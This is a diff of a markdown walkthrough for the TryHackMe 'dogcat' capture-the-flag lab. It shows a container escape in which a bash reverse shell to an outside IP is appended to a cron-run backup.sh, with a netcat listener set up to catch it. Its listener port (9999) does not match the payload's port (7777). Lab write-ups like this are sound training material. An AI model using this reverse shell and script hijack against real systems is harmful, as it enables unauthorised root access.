FullByte/FullByte.github.io/docs/tech/hack/challenges/tryhackme.com.md

 find / -type d \( -name sys -o -name proc \) -prune -o -name "*"  -mtime -0.02 -print
 ```

-We find that "backup.tar" was last udpated and it seems is updated every minute!
+We find that "backup.tar" was last udpated and it is updated every minute!
 It seems as if the backup is created using the shell script in the same folder.

-This looks promising: We are root in a container that hosts the dogcat website and there is a script triggered from outside of the container running the "backup.sh" script every minute.
+This looks promising: We are root in a container that hosts the dogcat website and there is a script triggered from outside of the container running the "backup.sh" script (that we are able to edit) every minute.

 Let's try to exploit the backup.sh with a bash reverse shell:

-First, start a new netcat session as root within the webserver container:
+First, start a new netcat session on your system:

 ```sh
 nc -lvnp 9999
 ```

-Then overwrite the backup script with this bash reverse shell:
+Then append the bash reverse shell to the backup script:

 ```sh
 echo "bash -i >& /dev/tcp/10.9.182.239/7777 0>&1" >> backup.sh
 ```

-After waiting at the most 59 secounds the backup job will trigger, run our modified script and we get root access to the container host :) whoop whoop!
+After waiting at most 59 secounds the backup job will trigger, run our modified script and we get another shell from the container host system.

+Running ```whoami``` we can see that we are root - whoop whoop!

 Let's search for flag 4: